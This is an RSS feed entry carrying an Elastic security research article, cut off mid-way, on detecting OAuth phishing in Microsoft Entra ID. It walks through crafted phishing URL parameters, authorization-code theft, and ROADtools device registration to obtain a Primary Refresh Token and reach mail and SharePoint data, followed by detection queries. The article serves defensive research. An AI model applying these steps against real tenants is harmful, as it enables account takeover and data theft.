<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Elastic Security Labs - Articles by Terrance DeJesus</title>
        <link>https://www.elastic.co/es/security-labs</link>
        <description>Trusted security news &amp; research from the team at Elastic.</description>
        <lastBuildDate>Thu, 12 Mar 2026 14:25:51 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <image>
            <title>Elastic Security Labs - Articles by Terrance DeJesus</title>
            <url>https://www.elastic.co/es/security-labs/assets/security-labs-thumbnail.png</url>
            <link>https://www.elastic.co/es/security-labs</link>
        </image>
        <copyright>© 2026. Elasticsearch B.V. All Rights Reserved</copyright>
        <item>
            <title><![CDATA[Microsoft Entra ID OAuth Phishing and Detections]]></title>
            <link>https://www.elastic.co/es/security-labs/entra-id-oauth-phishing-detection</link>
            <guid>entra-id-oauth-phishing-detection</guid>
            <pubDate>Wed, 25 Jun 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[This article explores OAuth phishing and token-based abuse in Microsoft Entra ID. Through emulation and analysis of tokens, scope, and device behavior during sign-in activity, we surface high-fidelity signals defenders can use to detect and hunt for OAuth misuse.]]></description>
            <content:encoded><![CDATA[<h1>Preamble</h1>
<p>Members of the Threat Research and Detection Engineering (TRADE) team at Elastic have recently turned their attention to an emerging class of threats targeting OAuth workflows in Microsoft Entra ID (previously Azure AD). This research was inspired by Volexity's recent blog, <a href="https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/">Phishing for Codes: Russian Threat Actors Target Microsoft 365 OAuth Workflows</a>, which attributes a sophisticated OAuth phishing campaign against NGOs to the threat actor designated <a href="https://malpedia.caad.fkie.fraunhofer.de/actor/uta0352">UTA0352</a>.</p>
<p>Volexity's investigation presents compelling forensic evidence of how attackers abused trusted first-party Microsoft applications to bypass traditional defenses. Using legitimate OAuth flows and the open-source tool <a href="https://github.com/dirkjanm/ROADtools">ROADtools</a>, the actors crafted customized Microsoft authentication URLs, harvested security tokens and leveraged them to impersonate users, elevate privilege, and exfiltrate data via Microsoft Graph — including downloading Outlook emails and accessing SharePoint sites.</p>
<p>While their report thoroughly documents the <strong>what</strong> of the attack, our team at Elastic focused on understanding the <strong>how</strong>. We emulated the attack chain in a controlled environment to explore the mechanics of token abuse, device registration, and token enrichment firsthand. This hands-on experimentation yielded deeper insights into the inner workings of Microsoft's OAuth implementation, the practical use of ROADtools, recommended mitigations, and most importantly, effective detection strategies to identify and respond to similar activity.</p>
<h1>OAuth in Microsoft Entra ID</h1>
<p>Microsoft Entra ID implements OAuth 2.0 to enable delegated access to Microsoft 365 services like Outlook, SharePoint, and Graph API. While the OAuth specification is standardized (<a href="https://datatracker.ietf.org/doc/html/rfc6749">RFC6749</a>), Entra ID introduces unique behaviors and token types that influence how delegated access works and how adversaries exploit them.</p>
<p>In delegated access, an application is authorized to act on behalf of a signed-in user, constrained by scopes (permissions) the app requests and the user or admin consents to. This model is common in enterprise environments where apps retrieve a user's emails, files, or directory data without prompting for credentials each time.</p>
<p>A typical delegated authorization flow includes:</p>
<p><strong>Authorization request (OAuth 2.0 Authorization Code Grant)</strong>: The app requests access to a resource (e.g., Graph) with specific scopes (e.g., Mail.Read, offline_access). These are added as parameters to the URI.</p>
<ul>
<li><em>client_id</em>: The application’s ID (e.g., VSCode)</li>
<li><em>Response_type</em>: Determines the grant type OAuth workflow (e.g. device code, auth code)</li>
<li><em>Scope</em>: Permissions requested for the target resource (e.g. <em>Mail.Read, offline_access)</em></li>
<li><em>Redirect_uri</em>: Where to send our authorization codes</li>
<li><em>State</em>: CSRF protection</li>
<li><em>Login_hint</em>: Pre-fills username</li>
</ul>
<p><strong>User authentication (OpenID Connect)</strong>: Entra ID authenticates the user via policy (password, MFA, device trust).</p>
<ul>
<li>Single-Factor Authentication (SFA)</li>
<li>Multi-factor Authentication (MFA)</li>
<li>Device Trust (Hybrid Join, Intune compliance)</li>
<li>Conditional Access Policies (CAP)</li>
<li>Single Sign-On (SSO)</li>
</ul>
<p><strong>Consent:</strong> Consent governs whether the app can receive an authorization code and what scopes are permitted.</p>
<ul>
<li>User-consentable scopes (e.g. <em>Mail.Read, offline_access)</em></li>
<li>Admin-Consent required scopes (e.g. <em>Directory.ReadWrite</em>) requires elevated approval.</li>
</ul>
<p><strong>Token issuance</strong>: The app receives an authorization code, then redeems it for :</p>
<ul>
<li>Access Token – short-lived token used to call APIs like Graph.</li>
<li>Refresh Token (RT) – longer-lived token to obtain new access tokens silently.</li>
<li>Identity Token - Describes authenticated user; present in OpenID flows.</li>
<li>(Optional) Primary Refresh Token: If the user is on a domain-joined or registered device, a Primary Refresh Token (PRT) may enable silent SSO and additional token flows without user interaction.</li>
<li><strong>Token claims:</strong> Claims are key-value pairs embedded in JWT tokens that describe the user, app, device, scopes and context of the authentication.</li>
</ul>
<h1>What Defines an MSFT OAuth Phishing URL</h1>
<p>Before diving into key findings from Volexity's report that help shape our detection strategy, it's important to break down what exactly defines a Microsoft OAuth phishing URL.</p>
<p>As described earlier, Microsoft Entra ID relies on these URLs to determine which application (client) is requesting access, on behalf of which user principal, to what resource, and with what permissions. Much of this context is embedded directly in the query parameters of the OAuth authorization request,  making them a critical source of metadata for both adversaries and defenders.</p>
<p>Here's an example of a phishing URL aligned with the authorization code grant flow, adapted from Volexity's blog:</p>
<pre><code>https://login.microsoftonline[.]com/organizations/oauth2/v2.0/authorize?state=https://mae.gov[.]ro/[REMOVED]&amp;client_id=aebc6443-996d-45c2-90f0-388ff96faa56&amp;scope=https://graph.microsoft.com/.default&amp;response_type=code&amp;redirect_uri=https://insiders.vscode.dev/redirect&amp;login_hint=&lt;EMAIL HERE&gt;
</code></pre>
<p>Let's break down some of the key components:</p>
<ul>
<li>login.microsoftonline.com – The global Microsoft Entra ID authentication endpoint.</li>
<li>/oauth2/v2.0/authorize - MSFT Entra ID OAuth v2.0 endpoint for authorization workflows</li>
<li>state – Optional value used to prevent CSRF and maintain application state. Sometimes abused to obfuscate phishing redirections.</li>
<li>client_id – The application ID making the request. This could belong to Microsoft first-party apps (like VSCode, Teams) or malicious third-party apps registered by adversaries.</li>
<li>scope – Defines the permissions the application is requesting (e.g., Mail.Read, offline_access). The .default scope is often used for client credential flows to get pre-consented permissions.</li>
<li>response_type=code – Indicates the flow is requesting an authorization code, which can later be exchanged for an access and/or refresh token.</li>
<li>redirect_uri – Where Entra ID will send the response after the user authenticates. If an attacker controls this URI, they gain the code or it is a MSFT-managed URI that is valid.</li>
<li>login_hint – Specifies the target user (e.g., alice @ tenant.onmicrosoft.com). Often pre-filled to lower friction during phishing.</li>
</ul>
<p>Note: While this example illustrates a common Microsoft Entra ID OAuth phishing URL, there are many variations. Adversaries may adjust parameters such as the client ID, scopes, grant types or redirect URIs depending on their specific objectives, whether it's to gain persistent access, exfiltrate emails, or escalate privileges via broader consent grants.</p>
<h2>Why Does This Matter?</h2>
<p>Because these parameters are customizable, adversaries can easily swap out values to suit their operation. For example:</p>
<ul>
<li>They might use a legitimate Microsoft client ID to blend in with benign applications.</li>
<li>They may use a .default scope to bypass specific consent prompts.</li>
<li>They’ll point the redirect_uri to a site under their control to collect the authorization code.</li>
<li>They can target specific user principals they may have identified during reconnaissance.</li>
<li>They can adjust permissions to target resources based on their operational needs.</li>
</ul>
<p>Once a target authenticates, the goal is simple – obtain an authorization code. This code is then exchanged (often using tools like ROADtools) for a refresh token and/or access token, enabling the attacker to make Graph API calls or pivot into other Microsoft 365 services, all without further user interaction.</p>
<h1>Abstraction of Volexity's Key Findings</h1>
<p>For threat detection, it is critical to understand the protocols like OAuth, workflow implementation in Microsoft Entra ID, and contextual metadata about the behaviors and/or steps taken by the adversary regarding this operation.</p>
<p>From Volexity's investigation and research, we can key in the different variations of OAuth phishing reported. We decided to break these down for easier understanding:</p>
<p><strong>OAuth Phishing To Access Graph API as VSCode Client On-Behalf-Of Target User Principal</strong>: These URLs are similar to our example “What Defines an MSFT OAuth Phishing URL” – the end game goal being an access token to Graph API with default permissions.</p>
<ul>
<li>OAuth phishing URLs were custom, pointing to &quot;authorize&quot; endpoint</li>
<li>Client IDs were specifically VSCode (&quot;aebc6443-996d-45c2-90f0-388ff96faa56&quot;)</li>
<li>Resource/Scope was MSFT Graph (&quot;<a href="https://graph.microsoft.com/.default">https://graph.microsoft.com/.default</a>&quot;) with .default permissions</li>
<li>Token grant flows were auth code (response_type=code)</li>
<li>Redirect URIs were for legitimate MSFT domains (insiders[.]vscode[.]dev or vscode-redirect[.]azurewebsites[.]net)</li>
<li>Login hints were the specific user principal being targeted (not service principals)</li>
<li>Adversary required the target to open the URL, authenticate and share the authorization code (1.AXg….)</li>
</ul>
<p>From here, the adversary would be able to make a request to MSFT's OAuth token endpoint (<em><a href="https://login.microsoftonline.com/%5Btenant_id%5D/oauth2/v2.0/token">https://login.microsoftonline.com/[tenant_id]/oauth2/v2.0/token</a></em>) and exchange the refresh token for an access token. This is enough to allow the adversary to access Graph API and access resources normally available to the user. These indicators will be crucial to factoring our detection and hunting strategies later on in this blog.</p>
<p><strong>OAuth Phishing for Device Registration as MSFT Auth Broker</strong>: These URLs are unique as they are chained with subsequence ROADtools usage to register a virtual device, exchange an RT for a PRT, and require PRT enrichment to accomplish email access via Graph API and Sharepoint access.</p>
<ul>
<li>OAuth phishing URLs were custom, pointing to authorize (<em><a href="https://login.microsoftonline.com/%5Btenant_id%5D/oauth2/v2.0/authorize">https://login.microsoftonline.com/[tenant_id]/oauth2/v2.0/authorize</a></em>) endpoint</li>
<li>Client IDs were specifically MSFT Authentication Broker (&quot;29d9ed98-a469-4536-ade2-f981bc1d605e&quot;)</li>
<li>Resource/Scope was Device Registration Service (DRS) (&quot;01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9&quot;)</li>
<li>Token grant flows were auth code (response_type=code)</li>
<li>Redirect URI includes cloud-based domain join endpoint (typically used during Windows setup or Autopilot)</li>
<li>Login hint contains user principal email address (Target)</li>
<li>Request is ultimately for an ADRS token</li>
</ul>
<p>If the user is phished and opens the URL, authenticating will provide an ADRS token that is required for the adversary to register a device and subsequently obtain a PRT with the device’s private key and PEM file.</p>
<p>Volexity's blog also includes additional information about tracking the activity of the compromise identity via the device ID registered as well as post-compromise activity following an approved 2FA request was identified, allowing the adversary to download the target's email with a session tied to the newly registered device.</p>
<p>With this understanding of each phishing attempt, our next goal is to replicate this in our own MSFT tenant as accurately as possible to gather data for plausible detections.</p>
<h1>Our Emulation Efforts</h1>
<p>Alright – so at this point, we’ve covered the fundamentals of OAuth and how Microsoft Entra ID implements it. We broke down what defines a Microsoft OAuth phishing URL, decoded its critical parameters, and pulled key insights from Volexity's excellent investigation to identify indicators aligned with these phishing workflows.</p>
<p>But theory and a glimpse into Volexity's notebook only takes us so far.</p>
<p>To truly understand the attacker's perspective, the full chain of execution, tooling quirks, subtle pitfalls, and opportunities for abuse,  we decided to go hands-on with whitebox testing. We recreated the OAuth phishing process in our own tenant, emulating everything from token harvesting to resource access. The goal? Go beyond static indicators and surface the behavioral breadcrumbs that defenders can reliably detect.</p>
<p>Let's get into it.</p>
<h2>Prerequisites</h2>
<p>For starters, it is good to share some details about our threat research and detection environment in Azure.</p>
<ul>
<li>Established Azure tenant: TENANT.onmicrosoft.com</li>
<li>Established Sharepoint Domain: DOMAIN.sharepoint.com</li>
<li>Native IdP Microsoft Entra ID – Enabling our IAM</li>
<li>Microsoft 365 Licenses (P2) for All Users</li>
<li>Azure Activity Logs Streaming to EventHub</li>
<li>Microsoft Entra ID Sign-In Logs Streaming to EventHub</li>
<li>Microsoft Entra ID Audit Logs Streaming to EventHub</li>
<li>Microsoft Graph Audit Logs Streaming to EventHub</li>
<li>Microsoft 365 Audit Logs Streaming to EventHub</li>
<li>Elastic Azure and M365 Integration Enabled for Log Digestion from EventHub</li>
<li>Basic Admin User Enabled with CAP Requiring MFA</li>
<li>MSFT Authenticator App on Mobile for 2FA Emulation</li>
<li>Windows 10 Desktop with NordVPN (Adversary Box)</li>
<li>macOS endpoint (Victim box)</li>
</ul>
<p>Note that while we could follow the workflows from a single endpoint, often we need data that reflects separate source addresses to developer detection variations of impossible travel.</p>
<h1>Scenario 1: OAuth Phishing as VSCode Client</h1>
<h2>Emulation</h2>
<p>To emulate the phishing technique documented by Volexity, we built a Python script to generate an OAuth 2.0 authorization URL using Microsoft Entra ID. The URL initiates an authorization code grant flow, impersonating the first-party Visual Studio Code app to request delegated access to the Microsoft Graph API.</p>
<p>We configured the URL with the following parameters:</p>
<pre><code class="language-json">{
  &quot;client_id&quot;: &quot;aebc6443-996d-45c2-90f0-388ff96faa56&quot;,
  &quot;response_type&quot;: &quot;code&quot;,
  &quot;redirect_uri&quot;: &quot;insiders.vscode.dev/redirect&quot;,
  &quot;scope&quot;: &quot;https://graph.microsoft.com/.default&quot;,
  &quot;login_hint&quot;: &quot;user @ tenant.onmicrosoft.com&quot;,
  &quot;prompt&quot;: &quot;select_account&quot;,
  &quot;state&quot;: &quot;nothingtoseehere&quot;
}
</code></pre>
<p><em>Figure 1: Parameters for OAuth Phishing URL</em></p>
<p>This URL is shared with the target (in our case, a MacOS test user). When opened, it authenticates the user and completes the OAuth workflow. Using browser developer tools, we capture the authorization code returned in the redirect URI,  exactly what the attackers asked their victims to send back.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image7.png" alt="Figure 2: Redirect query string parameters with authorization code after authentication" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image2.png" alt="Figure 3: Python script execution for generating OAuth phishing URL and exchanging auth code for Token" /></p>
<p>After receiving the code, we issue a POST request to:</p>
<pre><code class="language-json">{token_url: &quot;https://login.microsoftonline.com/organizations/oauth2/v2.0/token&quot;}
</code></pre>
<p>This exchange uses the authorization_code grant type, passing the code, client ID, and redirect URI. Microsoft returns an access token, but no refresh token. You might ask why that is?</p>
<p>The scope <a href="https://graph.microsoft.com/.default">https://graph.microsoft.com/.default</a> instructs Microsoft to issue a bearer token for all Graph permissions already granted to the VSCode app on behalf of the user. This is a static scope, pulling from the app registration,  it does not include dynamic scopes like Mail.Read or offline_access.</p>
<p>Microsoft's documentation states:</p>
<p>““<em>Clients can’t combine static (.default) consent and dynamic consent in a single request.</em>””</p>
<p>Therefore, trying to include offline_access alongside <em>.default</em> results in an error. If the attacker wants a refresh token, they must avoid <em>.default</em> and instead explicitly request <em>offline_access</em> and the required delegated scopes (e.g., Mail.Read) – Assuming the app registration supports those.</p>
<p>With the access token in hand, we pivoted to a second script to interact with the Microsoft Graph API. The goal – extract email messages from the victim’s account — just as the attacker would.</p>
<p>To do this, we included the access token as a Bearer JWT in the authorization header and made a GET request to the following endpoint:</p>
<pre><code class="language-json">{graph_url: &quot;https://graph.microsoft.com/v1.0/me/messages&quot;}
</code></pre>
<p>The response returns a JSON array of email objects. From here, we simply iterate through the results and parse out useful metadata such as sender, subject, and received time.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image4.png" alt="Figure 4: Leveraging access token to access user emails via Graph API" /></p>
<p>To test the token’s broader privileges, we also attempted to enumerate SharePoint sites using:</p>
<pre><code class="language-json">{graph_search_url: &quot;https://graph.microsoft.com/v1.0/sites?search=*&quot;}
</code></pre>
<p>The request failed with an access denied error – which leads us to an important question: why did email access work, but SharePoint access did not? The reason is that the first-party client (VSCode: aebc6443-996d-45c2-90f0-388ff96faa56) does not have default delegated permissions with Graph for Sharepoint – as predefined by Microsoft. Therefore, we know the adversary is limited on what they can access.</p>
<p>To ensure this was accurate, we decoded the access token to identify the SCP associated with VSCode with <em>.default</em> permissions to Graph – Verifying no <em>Sites.</em>* permissioned by Microsoft.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image11.png" alt="Figure 5: Decoded Entra ID Access Token" /></p>
<p>This is one of the variations described by Volexity, but does help us understand more about the processes behind the scenes for the adversary – as well as resources, OAuth, and more for Microsoft Entra ID.</p>
<p>With the emulation complete, we now turn to identifying high-fidelity signals that are viable for SIEM detection and threat hunting. Our focus is on behavior observables in Microsoft Entra ID and Microsoft Graph logs.</p>
<h2>Detection</h2>
<h4>Signal 1 - Microsoft Entra ID OAuth Phishing as Visual Studio Code Client</h4>
<p>A successful OAuth 2.0 (authorization) and OpenID Connect (authentication) flow was completed using the first-party Microsoft application Visual Studio Code (VSCode). The sign-in occurred on behalf of the phished user principal, resulting in delegated access to Microsoft Graph with <em>.default</em> permissions.</p>
<pre><code>event.dataset: &quot;azure.signinlogs&quot; and
event.action: &quot;Sign-in activity&quot; and
event.outcome: &quot;success&quot; and
azure.signinlogs.properties.user_type: &quot;Member&quot; and
azure.signinlogs.properties.authentication_processing_details: *Oauth* and
azure.signinlogs.category: &quot;NonInteractiveUserSignInLogs&quot; and
(
  azure.signinlogs.properties.resource_display_name: &quot;Microsoft Graph&quot; or
  azure.signinlogs.properties.resource_id: &quot;00000003-0000-0000-c000-000000000000&quot;
) and (
  azure.signinlogs.properties.app_id: &quot;aebc6443-996d-45c2-90f0-388ff96faa56&quot; or
  azure.signinlogs.properties.app_display_name: &quot;Visual Studio Code&quot;
)
</code></pre>
<h4>Signal 2 - Microsoft Entra Session Reuse with Suspicious Graph Access</h4>
<p>While traditional query languages like KQL are excellent for filtering and visualizing individual log events, they struggle when a detection relies on correlating multiple records across datasets, time, and identifiers. This is where ES|QL (Elasticsearch Query Language) becomes essential. These types of multi-event correlations, temporal logic, and field normalization are difficult or entirely impossible in static filter-based query languages like KQL without writing multiple disjointed queries and manually correlating them after the fact.</p>
<p>This detection relies on correlating multiple events that happen close together but from different data sources,  namely sign-in logs and Microsoft Graph activity. The goal is to find suspicious reuse of the same session ID across multiple IPs, potentially indicating session hijacking or token abuse. For the sake of space regarding this publication, you can view the actual detection rule in the Detection Rules section. To better illustrate the flow of the query and meaning, below is a diagram to illustrate at a higher level.</p>
<pre><code>[ FROM logs-azure.* ]
        |
        |  ← Pulls events from all relevant Microsoft Cloud datasets:
        |     - azure.signinlogs (authentication)
        |     - azure.graphactivitylogs (resource access)
        ↓
[ WHERE session_id IS NOT NULL AND IP NOT MICROSOFT ASN ]
        |
        |  ← Filters out Microsoft-owned infrastructure (e.g., internal proxy,
        |     Graph API relays) using ASN checks.
        |  ← Ensures session ID exists so events can be correlated together.
        ↓
[ EVAL session_id, event_type, time_window, etc. ]
        |
        |  ← Normalizes key fields across datasets:
        |     - session_id (from signin or Graph)
        |     - user ID, app ID, event type (&quot;signin&quot; or &quot;graph&quot;)
        |  ← Buckets events into 5-minute windows using DATE_TRUNC()
        ↓
[ KEEP selected fields ]
        |
        |  ← Retains only what's needed:
        |     session_id, timestamp, IP, user, client ID, etc.
        ↓
[ STATS BY session_id + time_window ]
        |
        |  ← Groups by session and time window to compute:
        |     - unique IPs used
        |     - apps involved
        |     - first and last timestamps
        |     - whether both signin and graph occurred
        ↓
[ EVAL time_diff + signin_to_graph_delay ]
        |
        |  ← Calculates:
        |     - time_diff: full session duration
        |     - delay: gap between signin and Graph access
        ↓
[ WHERE types_count &gt; 1 AND unique_ips &gt; 1 AND delay &lt;= 5 ]
        |
        |  ← Flags sessions where:
        |     - multiple event types (signin + graph)
        |     - multiple IPs used
        |     - all occurred within 5 minutes
        ↓
[ Output = Suspicious Session Reuse Detected ]
</code></pre>
<h4>Signal 3 - Microsoft Entra ID Concurrent Sign-Ins with Suspicious Properties</h4>
<p>This detection identifies suspicious sign-ins in Microsoft Entra ID where a user authenticates using the device code flow without MFA or sign-ins using the VSCode client. When the same identity signs in from two or more distinct IPs within a short time window using either method, it may indicate token replay, OAuth phishing, or adversary-in-the-middle (AitM) activity.</p>
<pre><code>[ FROM logs-azure.signinlogs* ]
        |
        |  ← Pulls only Microsoft Entra ID sign-in logs
        ↓
[ WHERE @timestamp &gt; NOW() - 1h AND event.outcome == &quot;success&quot; ]
        |
        |  ← Filters to the last hour and keeps only successful sign-ins
        ↓
[ WHERE source.ip IS NOT NULL AND identity IS NOT NULL ]
        |
        |  ← Ensures the sign-in is tied to a user and IP for correlation
        ↓
[ KEEP fields: identity, app_id, auth_protocol, IP, etc. ]
        |
        |  ← Retains app/client, IP, auth method, and resource info
        ↓
[ EVAL detection flags ]
        |
        |  ← Labels events as:
        |     - device_code: if MFA not required
        |     - visual_studio: if VS Code client used
        |     - other: everything else
        ↓
[ STATS BY identity ]
        |
        |  ← Aggregates all sign-ins per user, calculates:
        |     - IP count
        |     - Device Code or VSCode usage
        |     - App/client/resource details
        ↓
[ WHERE src_ip &gt;= 2 AND (device_code_count &gt; 0 OR vsc &gt; 0) ]
        |
        |  ← Flags users with:
        |     - Sign-ins from multiple IPs
        |     - And either:
        |         - Device Code w/o MFA
        |         - Visual Studio Code app
        ↓
[ Output = Potential OAuth Phishing or Token Misuse ]
</code></pre>
<p>While this variation of OAuth phishing lacks the full persistence offered by refresh tokens or PRTs, it still provides adversaries with valuable one-time access to sensitive user data – such as emails – through legitimate channels. This exercise helps us understand the limitations and capabilities of static <em>.default</em> scopes, the influence of app registrations, and how Microsoft Graph plays a pivotal role in post-authentication. It also reinforces a broader lesson: not all OAuth phishing attacks are created equal. Some aim for longevity (as we will see later) through refresh tokens or device registration, while others focus on immediate data theft via first-party clients. Understanding the nuances is essential for accurate detection logic.</p>
<h1>Scenario 2: OAuth Phishing for Device Registration</h1>
<p>As we stated earlier – Volexity also reported a separate phishing playbook targeting victims, this time with the goal of registering a virtual device and obtaining a PRT. While this approach requires more steps from the adversary, the payoff is a token-granting token that offers far more utility for completing their operations. For our emulation efforts, we needed to expand our toolset and rely on ROADtools, just as the adversary did to remain accurate, however, several other python scripts were made for initial phishing and post-compromise actions.</p>
<h2>Emulation</h2>
<p>Starting with the initial phishing, we adjusted our Python script to craft a different OAuth URL that would be sent to our victim. This time, the focus was on our first-party client ID being the Microsoft Authentication Broker, requesting a refresh token with <em>offline_access</em> and redirecting to Entra ID’s cloud domain device joining endpoint URI.</p>
<pre><code class="language-json">{
  &quot;client_id&quot;: &quot;29d9ed98-a469-4536-ade2-f981bc1d605e&quot;,
  &quot;response_type&quot;: &quot;code&quot;,
  &quot;response_mode&quot;: &quot;query&quot;,
  &quot;redirect_uri&quot;: &quot;https://login.microsoftonline.com/WebApp/CloudDomainJoin/8&quot;,
  &quot;resource&quot;: &quot;01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9&quot;,
  &quot;state&quot;: &quot;nothingtoseehere&quot;
}
</code></pre>
<p>If successful and our victim authenticates, the OAuth workflow will complete and the user will be redirected to the specified URI with an appended authorization code in the query parameters. Again, this code is the critical piece,  it must be shared back with the adversary in order to exchange it for tokens. In our case, once the phishing URL is opened and the target authenticates, we capture the authorization code embedded in the redirect and use it to request tokens from the Microsoft Entra ID token endpoint.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image5.png" alt="Figure 6: Microsoft Authentication Broker OAuth Phishing and token exchange with custom Python script" /></p>
<p>Now, here's where it gets interesting. In response to the token request, we receive three types of tokens: an access token, a refresh token, and an ID token. You might be asking –  why do we get more than just an access token? The answer lies in the scopes we initially requested: <em>openid</em>, <em>offline_access</em>, and <em>profile</em>.</p>
<ul>
<li><em>openid</em> grants us an ID token, which is part of the OpenID Connect layer and confirms the identity of the user — this is your authentication (authN) artifact.</li>
<li><em>offline_access</em> provides a refresh token, enabling us to maintain a session and request new access tokens without requiring re-authentication, this supports persistent access but is critical for our use with ROADtx.</li>
<li>And the access token itself is used to authorize requests to protected APIs like Microsoft Graph, this represents authorization (authZ).</li>
</ul>
<p>With these three tokens, we have everything: authentication, authorization, and long-term session continuity. That’s enough to shift from a simple OAuth phishing play into a more persistent foothold — like registering a new device in Microsoft Entra ID.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image10.png" alt="Figure 7: Captured JWT access, refresh and id token after exchange with authorization code" /></p>
<p>Now let’s connect the dots. A PRT requires registration of a valid device, one that Entra ID recognizes via a device certificate and private key. This is where ROADtx comes into play. Because our initial OAuth phishing impersonated a joined device flow, and the client used was the Microsoft Authentication Broker (a first-party client that interacts with the Device Registration Service), we already have the right access token in hand to interact with DRS. Notice in our returned object the scope is <em>adrs_access</em> which indicates Azure DRS access and is important for detections later.</p>
<p>From here, we simply drop the JSON object received from our token exchange into the <em>.roadtool_auth</em> file. This file is natively consumed by ROADtools, which uses the stored tokens to perform the device registration, completing the adversary’s move into persistence and setting the stage for obtaining a valid PRT.</p>
<p>After obtaining the tokens, we prep them for ROADtx by reformatting the JSON. ROADtx expects keys in camelCase, and we must also include the Microsoft Authentication Broker’s client ID as <em>_clientId</em>. This setup allows us to run the <em>refreshtokento</em> command, which takes our refresh token and exchanges it for a new JWT scoped to the DRS — specifically, the service principal <em>urn:ms-drs:enterpriseregistration.windows.net</em>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image1.png" alt="Figure 8: New authentication material from “refreshtokento” command for DRS as Microsoft Authentication Broker" /></p>
<p>Once that’s in place, we use the device command to simulate a new device registration. This operation doesn’t require any actual virtual machine or physical host because it’s a backend registration that simply creates an entry in Entra ID. Upon success, we’re issued a valid device ID, PEM-encoded certificate, and private key — all of which are required to simulate a valid hybrid-joined device in the Microsoft ecosystem.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image9.png" alt="Figure 9: “device” command output from registering a device and receiving a PEM certificate and private key" /></p>
<p>With our device identity established, we invoke the <em>prt</em> command. This uses the refresh token, device certificate, and private key to mint a new PRT — a highly privileged credential that effectively ties together user and device trust in Microsoft Entra ID.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image3.png" alt="Figure 10: “prt” command with refresh token, PEM certificate and private key to obtain a PRT" /></p>
<p>And just like that — whollah! — we have a PRT.</p>
<p>But why go through all this? Why register a device, generate a cert, and obtain a PRT when we already had an access token, ID token, and refresh token?</p>
<p>Because the PRT is the key to full user and device identity emulation. Think of it as a Kerberos-like ticket-granting token in Entra ID’s world, but instead – a token-granting token. With a valid PRT:</p>
<ul>
<li>An adversary can request new access and ID tokens for first-party apps like Outlook, SharePoint, or Teams without needing user interaction.</li>
<li>The PRT enables seamless single sign-on SSO across multiple services, bypassing MFA and other conditional access policies (CAP) that would typically re-prompt the user. This is crucial for persistence as CAP and MFA are often huge barriers for adversaries.</li>
<li>It supports long-lived persistence, as the PRT can be silently renewed and leveraged across sessions as long as the device identity remains trusted.</li>
</ul>
<p>And perhaps most dangerously — the PRT allows adversaries to impersonate a fully compliant, domain-joined device and user combo, effectively bypassing most conventional detection and response controls making the line between benign vs suspicious extremely thin for hunters and analysts.</p>
<p>This makes the PRT an incredibly valuable asset or one that enables covert lateral movement, privilege escalation, and deep access to Microsoft 365 services. It’s not just about getting in anymore — it’s about staying undetected.</p>
<p>Let’s not forget post-compromise activity…</p>
<p>ROADtx offers a few powerful commands frequently used by adversaries – <em>prtenrich</em> and <em>browserprtauth</em>. For example, we can access most browser-based UI services in the Microsoft suite by supplying our PRT which includes the necessary metadata for authentication and authorization – which originally belonged to our phishing victim (me), but is actually the Microsoft Authentication Broker acting on their behalf.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image12.png" alt="Figure 11: Accessing M365 Copilot with PRT via “browserprtauth” command" /></p>
<p>Volexity also reported that following device registration and the PRT acquisition – a 2FA request was sent to the initial victim, approved and then used to access emails via SharePoint. While they do not specify exactly how requests were made to – it’s reasonable to assume the adversary used the PRT to authenticate via a first-party Microsoft client – with the actual data access happening through Microsoft Graph. Graph remains a popular target post-compromise because it serves as a central API hub for most Microsoft 365 resources.</p>
<p>To start – let’s leverage ROADtx to auth with our PRT where Microsoft Teams is our client and Microsoft Graph is our resource. When using the <em>prtauth</em> command with our PRT, we are able to obtain a new access token and refresh token – clearly demonstrating the utility of the PRT as a token-granting token within Microsoft’s identity fabric.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image8.png" alt="Figure 12: “prtauth” command for tokens as MSFT Teams client for MSFT Graph resource" /></p>
<p>Once our access token is obtained, we plug it into a custom Python script to start enumerating our SharePoint sites, drives, items which allows us to identify files of interest and download their contents.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image6.png" alt="Figure 13: Discovering all SharePoint sites in tenant and downloading user files via MSFT Graph" /></p>
<p>With this emulation – we showed how adversaries can chain OAuth phishing with the Microsoft Authentication Broker and obtain necessary credential material to leverage ROADtx for acquiring a PRT. This PRT then being an important utility post-compromise to access sensitive files, enumerate tenant resources and much more.</p>
<p>Now, let’s shift focus: what are plausible and accurate signals for detecting this activity?</p>
<h2>Detection</h2>
<h3>Signal 1 - Microsoft Entra ID OAuth Phishing as Microsoft Authentication Broker</h3>
<p>Identifies instances where a user principal initiates an OAuth authorization code flow using the Microsoft Authentication Broker (MAB) as the client and the Device Registration Service (DRS) as the target resource. This detection focuses on cases where a single session ID is reused across two or more distinct IP addresses within a short time window, and at least one request originates from a browser — behavior commonly associated with phishing.</p>
<pre><code>[ FROM logs-azure.signinlogs-* ]
        |
        |  ← Pulls all Microsoft Entra ID sign-in logs
        ↓
[ WHERE app_id == MAB AND resource_id == DRS ]
        |
        |  ← Filters to OAuth auth code requests targeting
        |     Microsoft Authentication Broker + Device Reg Service
        ↓
